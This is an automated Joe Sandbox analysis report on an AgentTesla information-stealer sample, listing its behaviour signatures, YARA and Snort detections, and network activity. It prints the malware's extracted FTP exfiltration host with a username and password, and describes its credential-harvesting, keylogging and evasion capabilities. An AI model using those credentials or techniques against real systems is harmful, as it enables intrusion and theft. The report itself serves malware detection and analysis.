Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
7F7R8soxHM.exe

Overview

General Information

Sample name:7F7R8soxHM.exe
renamed because original name is a hash value
Original sample name:8f537e91245bcc1510a9867cb88b12ea.exe
Analysis ID:1447089
MD5:8f537e91245bcc1510a9867cb88b12ea
SHA1:dfc1fac222ea213d44aa9b5de65c83ffbd80ba0c
SHA256:7615090de90b379091f499d125db3c25943f3992e9ed09dab3d2a701d11b2b01
Tags:32exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AgentTesla
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 7F7R8soxHM.exe (PID: 7568 cmdline: "C:\Users\user\Desktop\7F7R8soxHM.exe" MD5: 8F537E91245BCC1510A9867CB88B12EA)
    • RegSvcs.exe (PID: 7584 cmdline: "C:\Users\user\Desktop\7F7R8soxHM.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.transotraval.cl", "Username": "ugoomabless@transotraval.cl", "Password": "4)7@D4,-Q%Xj"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000001.00000002.2883490395.000000000295E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000001.00000002.2882256622.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000001.00000002.2882256622.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000000.00000002.1658984984.0000000001720000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000002.1658984984.0000000001720000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 8 entries
              SourceRuleDescriptionAuthorStrings
              0.2.7F7R8soxHM.exe.1720000.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.7F7R8soxHM.exe.1720000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.7F7R8soxHM.exe.1720000.1.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x31c61:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x31cd3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x31d5d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x31def:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x31e59:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x31ecb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x31f61:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x31ff1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  0.2.7F7R8soxHM.exe.1720000.1.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                  • 0x2f155:$s2: GetPrivateProfileString
                  • 0x2e850:$s3: get_OSFullName
                  • 0x2fe63:$s5: remove_Key
                  • 0x2fff3:$s5: remove_Key
                  • 0x30e9c:$s6: FtpWebRequest
                  • 0x31c43:$s7: logins
                  • 0x321b5:$s7: logins
                  • 0x34eba:$s7: logins
                  • 0x34f78:$s7: logins
                  • 0x368ca:$s7: logins
                  • 0x35b12:$s9: 1.85 (Hash, version 2, native byte-order)
                  0.2.7F7R8soxHM.exe.1720000.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 7 entries
                    No Sigma rule has matched
                    Timestamp:05/24/24-11:18:15.551341
                    SID:2855542
                    Source Port:49731
                    Destination Port:47566
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/24/24-11:18:14.933252
                    SID:2029927
                    Source Port:49730
                    Destination Port:21
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/24/24-11:18:15.551341
                    SID:2851779
                    Source Port:49731
                    Destination Port:47566
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 7F7R8soxHM.exeAvira: detected
                    Source: 1.2.RegSvcs.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.transotraval.cl", "Username": "ugoomabless@transotraval.cl", "Password": "4)7@D4,-Q%Xj"}
                    Source: 7F7R8soxHM.exeReversingLabs: Detection: 65%
                    Source: 7F7R8soxHM.exeVirustotal: Detection: 63%Perma Link
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.2% probability
                    Source: 7F7R8soxHM.exeJoe Sandbox ML: detected
                    Source: 7F7R8soxHM.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: Binary string: wntdll.pdbUGP source: 7F7R8soxHM.exe, 00000000.00000003.1643867500.0000000004190000.00000004.00001000.00020000.00000000.sdmp, 7F7R8soxHM.exe, 00000000.00000003.1643414153.0000000004330000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: 7F7R8soxHM.exe, 00000000.00000003.1643867500.0000000004190000.00000004.00001000.00020000.00000000.sdmp, 7F7R8soxHM.exe, 00000000.00000003.1643414153.0000000004330000.00000004.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00ED4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00ED4696
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EDC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00EDC9C7
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EDC93C FindFirstFileW,FindClose,0_2_00EDC93C
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EDF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00EDF200
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EDF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00EDF35D
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EDF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00EDF65E
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00ED3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00ED3A2B
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00ED3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00ED3D4E
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EDBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00EDBF27

                    Networking

                    barindex
                    Source: TrafficSnort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.2.4:49730 -> 201.148.105.186:21
                    Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49731 -> 201.148.105.186:47566
                    Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49731 -> 201.148.105.186:47566
                    Source: global trafficTCP traffic: 192.168.2.4:49731 -> 201.148.105.186:47566
                    Source: Joe Sandbox ViewASN Name: HOSTINGCL HOSTINGCL
                    Source: unknownFTP traffic detected: 201.148.105.186:21 -> 192.168.2.4:49730 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 05:18. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 05:18. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 05:18. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 05:18. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EE25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00EE25E2
                    Source: global trafficDNS traffic detected: DNS query: ftp.transotraval.cl
                    Source: RegSvcs.exe, 00000001.00000002.2883490395.000000000295E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.2883490395.000000000296C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.transotraval.cl
                    Source: RegSvcs.exe, 00000001.00000002.2883490395.000000000295E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: 7F7R8soxHM.exe, 00000000.00000002.1658984984.0000000001720000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.2882256622.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://account.dyn.com/

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: 0.2.7F7R8soxHM.exe.1720000.1.raw.unpack, R1W.cs.Net Code: c5vTEt6e3SV
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EE425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00EE425A
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EE4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00EE4458
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EE425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00EE425A
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00ED0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00ED0219
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EFCDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00EFCDAC

                    System Summary

                    barindex
                    Source: 0.2.7F7R8soxHM.exe.1720000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.7F7R8soxHM.exe.1720000.1.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.7F7R8soxHM.exe.1720000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.7F7R8soxHM.exe.1720000.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 00000000.00000002.1658984984.0000000001720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 00000000.00000002.1658984984.0000000001720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: This is a third-party compiled AutoIt script.0_2_00E73B4C
                    Source: 7F7R8soxHM.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: 7F7R8soxHM.exe, 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ab0ed4a8-f
                    Source: 7F7R8soxHM.exe, 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_2ab51996-9
                    Source: 7F7R8soxHM.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_3b4b08af-b
                    Source: 7F7R8soxHM.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_cc5768f8-7
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00ED40B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_00ED40B1
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EC8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00EC8858
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00ED545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00ED545F
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E7E8000_2_00E7E800
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E9DBB50_2_00E9DBB5
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E7E0600_2_00E7E060
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EF804A0_2_00EF804A
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E841400_2_00E84140
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E924050_2_00E92405
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EA65220_2_00EA6522
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EF06650_2_00EF0665
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EA267E0_2_00EA267E
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E868430_2_00E86843
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E9283A0_2_00E9283A
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EA89DF0_2_00EA89DF
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EF0AE20_2_00EF0AE2
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EA6A940_2_00EA6A94
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E88A0E0_2_00E88A0E
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00ECEB070_2_00ECEB07
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00ED8B130_2_00ED8B13
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E9CD610_2_00E9CD61
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EA70060_2_00EA7006
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E831900_2_00E83190
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E8710E0_2_00E8710E
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E712870_2_00E71287
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E933C70_2_00E933C7
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E9F4190_2_00E9F419
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E916C40_2_00E916C4
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E856800_2_00E85680
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E858C00_2_00E858C0
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E978D30_2_00E978D3
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E91BB80_2_00E91BB8
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EA9D050_2_00EA9D05
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E7FE400_2_00E7FE40
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E9BFE60_2_00E9BFE6
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E91FD00_2_00E91FD0
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_017136B00_2_017136B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_027A94081_2_027A9408
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_027A4A581_2_027A4A58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_027A9BC01_2_027A9BC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_027A3E401_2_027A3E40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_027ACE281_2_027ACE28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_027A41881_2_027A4188
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05FABCE81_2_05FABCE8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05FADC181_2_05FADC18
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05FA3F501_2_05FA3F50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05FA56E01_2_05FA56E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05FA00401_2_05FA0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05FA8B871_2_05FA8B87
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05FA2AF81_2_05FA2AF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05FA9AD01_2_05FA9AD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05FA50001_2_05FA5000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05FA32481_2_05FA3248
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: String function: 00E77F41 appears 35 times
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: String function: 00E90D27 appears 70 times
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: String function: 00E98B40 appears 42 times
                    Source: 7F7R8soxHM.exe, 00000000.00000003.1642654082.00000000042B3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 7F7R8soxHM.exe
                    Source: 7F7R8soxHM.exe, 00000000.00000003.1644430619.000000000445D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 7F7R8soxHM.exe
                    Source: 7F7R8soxHM.exe, 00000000.00000002.1658984984.0000000001720000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename18ef6abe-0433-4b57-8077-a2a6b10a362d.exe4 vs 7F7R8soxHM.exe
                    Source: 7F7R8soxHM.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: 0.2.7F7R8soxHM.exe.1720000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.7F7R8soxHM.exe.1720000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.7F7R8soxHM.exe.1720000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.7F7R8soxHM.exe.1720000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 00000000.00000002.1658984984.0000000001720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 00000000.00000002.1658984984.0000000001720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.7F7R8soxHM.exe.1720000.1.raw.unpack, KLhJmaON.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.7F7R8soxHM.exe.1720000.1.raw.unpack, KLhJmaON.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.7F7R8soxHM.exe.1720000.1.raw.unpack, 7hO8luD.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.7F7R8soxHM.exe.1720000.1.raw.unpack, 7hO8luD.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.7F7R8soxHM.exe.1720000.1.raw.unpack, 7hO8luD.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.7F7R8soxHM.exe.1720000.1.raw.unpack, 7hO8luD.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.7F7R8soxHM.exe.1720000.1.raw.unpack, 9HIFdl.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.7F7R8soxHM.exe.1720000.1.raw.unpack, 9HIFdl.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/4@1/1
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EDA2D5 GetLastError,FormatMessageW,0_2_00EDA2D5
